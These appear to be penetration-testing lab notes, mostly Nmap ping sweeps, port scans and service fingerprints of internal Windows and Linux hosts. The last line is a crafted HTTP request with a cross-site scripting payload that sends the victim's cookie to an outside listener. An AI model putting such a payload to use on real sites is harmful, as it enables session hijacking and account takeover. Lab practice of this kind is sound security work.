nmap -sn 10.200.130.0/24 Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 05:05 UTC Nmap scan report for ip-10-200-130-10.eu-west-1.compute.internal (10.200.130.10) Host is up (0.0015s latency). Nmap scan report for ip-10-200-130-101.eu-west-1.compute.internal (10.200.130.101) Host is up (0.0046s latency). Nmap scan report for ip-10-200-130-102.eu-west-1.compute.internal (10.200.130.102) Host is up (0.0046s latency). Nmap scan report for ip-10-200-130-103.eu-west-1.compute.internal (10.200.130.103) Host is up (0.0018s latency). Nmap scan report for ip-10-200-130-104.eu-west-1.compute.internal (10.200.130.104) Host is up (0.0046s latency). Nmap scan report for ip-10-200-130-105.eu-west-1.compute.internal (10.200.130.105) Host is up (0.0019s latency). Nmap scan report for ip-10-200-130-106.eu-west-1.compute.internal (10.200.130.106) Host is up (0.0042s latency). Nmap scan report for ip-10-200-130-107.eu-west-1.compute.internal (10.200.130.107) Host is up (0.0086s latency). Nmap scan report for ip-10-200-130-108.eu-west-1.compute.internal (10.200.130.108) Host is up (0.051s latency). Nmap scan report for ip-10-200-130-109.eu-west-1.compute.internal (10.200.130.109) Host is up (0.051s latency). Nmap scan report for ip-10-200-130-110.eu-west-1.compute.internal (10.200.130.110) Host is up (0.051s latency). Nmap scan report for ip-10-200-130-250.eu-west-1.compute.internal (10.200.130.250) Host is up (0.0014s latency). Nmap done: 256 IP addresses (12 hosts up) scanned in 3.41 seconds
端口扫描
nmap --min-rate=10000 -p- 10.200.130.10 Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 05:04 UTC Warning: 10.200.130.10 giving up on port because retransmission cap hit (10). Nmap scan report for ip-10-200-130-10.eu-west-1.compute.internal (10.200.130.10) Host is up (0.0037s latency). Not shown: 65444 closed tcp ports (reset), 77 filtered tcp ports (no-response) PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5985/tcp open wsman 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49670/tcp open unknown 49671/tcp open unknown 49680/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 14.76 seconds
nmap -sT -sV -sC -O -p135,139,445,3389,5985,47001,49664,49665,49666,49667,49668,49670,49671,49680 10.200.130.10 Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 05:07 UTC Nmap scan report for ip-10-200-130-10.eu-west-1.compute.internal (10.200.130.10) Host is up (0.0026s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=EC2AMAZ-A6S61FR | Not valid before: 2023-12-08T11:01:40 |_Not valid after: 2024-06-08T11:01:40 |_ssl-date: 2023-12-11T05:09:04+00:00; -1s from scanner time. | rdp-ntlm-info: | Target_Name: EC2AMAZ-A6S61FR | NetBIOS_Domain_Name: EC2AMAZ-A6S61FR | NetBIOS_Computer_Name: EC2AMAZ-A6S61FR | DNS_Domain_Name: EC2AMAZ-A6S61FR | DNS_Computer_Name: EC2AMAZ-A6S61FR | Product_Version: 10.0.17763 |_ System_Time: 2023-12-11T05:08:56+00:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49680/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Server 2012 (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows 10 1709 - 1909 (92%), Microsoft Windows Longhorn (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%), Microsoft Windows Server 2016 (90%), Microsoft Windows 10 1703 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 65.73 seconds
nmap --min-rate=10000 -p- 10.200.130.110 Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 05:19 UTC Nmap scan report for ip-10-200-130-109.eu-west-1.compute.internal (10.200.130.110) Host is up (0.039s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 631/tcp open ipp 8002/tcp open teradataordbms
Nmap done: 1 IP address (1 host up) scanned in 5.52 seconds
nmap -sT -sV -sC -O -p22,80,631,8002 10.200.130.110 Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 10:02 UTC Nmap scan report for ip-10-200-130-110.eu-west-1.compute.internal (10.200.130.110) Host is up (0.0021s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 8b3aac8362c717eea4039cc79e8b76cf (RSA) | 256 6f46f5662b04c2d76d725369911fca6d (ECDSA) |_ 256 4feb8ab69f8df6a55faf6d83f0fbf40e (ED25519) 80/tcp open http-proxy Apache Traffic Server 7.1.1 |_http-server-header: ATS/7.1.1 |_http-title: Not Found on Accelerator 631/tcp open ipp CUPS 2.4 |_http-title: Bad Request - CUPS v2.4.5 |_http-server-header: CUPS/2.4 IPP/2.1 8002/tcp open hadoop-datanode Apache Hadoop | hadoop-datanode-info: |_ Logs: login.php | hadoop-tasktracker-info: |_ Logs: login.php |_http-title: BANDIT Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.25 seconds
GET /?filter=a"/><script>document.write('<img+src%3d"http%3a//10.50.127.157%3a8002/test.gif%3fcookie%3d'+%2b+document.cookie+%2b+'"+/>')</script> HTTP/1.1 Whaterever:""".replace('\n','\r\n')